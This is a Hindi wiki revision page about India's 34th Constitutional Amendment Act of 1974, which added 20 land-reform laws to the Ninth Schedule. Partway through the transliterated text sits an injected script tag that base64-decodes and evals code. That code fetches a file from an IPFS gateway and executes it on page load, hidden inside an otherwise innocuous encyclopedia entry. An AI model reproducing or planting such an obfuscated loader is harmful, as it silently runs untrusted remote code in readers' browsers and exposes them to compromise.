Difference between revisions of "संविधान संशोधन- 34वाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''भारत का संविधान (34वाँ संशोधन) अधिनियम, 1974''' *भारत के स...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 +
{{सूचना बक्सा संक्षिप्त परिचय
 +
|चित्र=The-Constitution-Of-India.jpg
 +
|चित्र का नाम=भारत का संविधान
 +
|विवरण='[[भारतीय संविधान]]' का निर्माण 'संविधान सभा' द्वारा किया गया था। [[संविधान]] में समय-समय पर आवश्यकता होने पर संशोधन भी होते रहे हैं। विधायिनी सभा में किसी विधेयक में परिवर्तन, सुधार अथवा उसे निर्दोष बनाने की प्रक्रिया को ही 'संशोधन' कहा जाता है।
 +
|शीर्षक 1=संविधान लागू होने की तिथि
 +
|पाठ 1=[[26 जनवरी]], [[1950]]
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=34वाँ संशोधन
 +
|पाठ 3=[[1974]]
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[भारतीय संविधान सभा|संविधान सभा]]
 +
|अन्य जानकारी='[[भारत का संविधान]]' [[ब्रिटेन]] की संसदीय प्रणाली के नमूने पर आधारित है, किन्तु एक विषय में यह उससे भिन्न है। ब्रिटेन में संसद सर्वोच्च है, जबकि [[भारत]] में [[संसद]] नहीं; बल्कि 'संविधान' सर्वोच्च है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
'''भारत का संविधान (34वाँ संशोधन) अधिनियम, 1974'''
 
'''भारत का संविधान (34वाँ संशोधन) अधिनियम, 1974'''
 
*[[भारत]] के संविधान में एक और [[संविधान संशोधन|संशोधन]] किया गया।
 
*[[भारत]] के संविधान में एक और [[संविधान संशोधन|संशोधन]] किया गया।
*इस अधिनियम द्वारा विभिन्न राज्य विधानमंडलों द्वारा बनाए गए 20 और काश्तकारी व भूमि सुधार कानूनों को नौंवीं अनुसूची में शामिल किया गया।
+
*इस अधिनियम द्वारा विभिन्न राज्य विधानमंडलों द्वारा बनाए गए 20 और काश्तकारी व भूमि सुधार क़ानूनों को नौंवीं अनुसूची में शामिल किया गया।
 
*इन अधिनियमों को मिलाकर नवम अनुसूची में सम्मिलित अधिनियमों की कुल संख्या 86 हो गई है।
 
*इन अधिनियमों को मिलाकर नवम अनुसूची में सम्मिलित अधिनियमों की कुल संख्या 86 हो गई है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{संविधान संशोधन}}
 
{{संविधान संशोधन}}

Latest revision as of 10:35, 5 July 2013

sanvidhan sanshodhan- 34vaan
vivaran 'bharatiy sanvidhan' ka nirman 'sanvidhan sabha' dvara kiya gaya tha. sanvidhan mean samay-samay par avashyakata hone par sanshodhan bhi hote rahe haian. vidhayini sabha mean kisi vidheyak mean parivartan, sudhar athava use nirdosh banane ki prakriya ko hi 'sanshodhan' kaha jata hai.
sanvidhan lagoo hone ki tithi 26 janavari, 1950
34vaan sanshodhan 1974
sanbandhit lekh sanvidhan sabha
any janakari 'bharat ka sanvidhan' briten ki sansadiy pranali ke namoone par adharit hai, kintu ek vishay mean yah usase bhinn hai. briten mean sansad sarvochch hai, jabaki bharat mean sansad nahian; balki 'sanvidhan' sarvochch hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bharat ka sanvidhan (34vaan sanshodhan) adhiniyam, 1974

  • bharat ke sanvidhan mean ek aur sanshodhan kiya gaya.
  • is adhiniyam dvara vibhinn rajy vidhanamandaloan dvara banae ge 20 aur kashtakari v bhoomi sudhar qanoonoan ko nauanvian anusoochi mean shamil kiya gaya.
  • in adhiniyamoan ko milakar navam anusoochi mean sammilit adhiniyamoan ki kul sankhya 86 ho gee hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh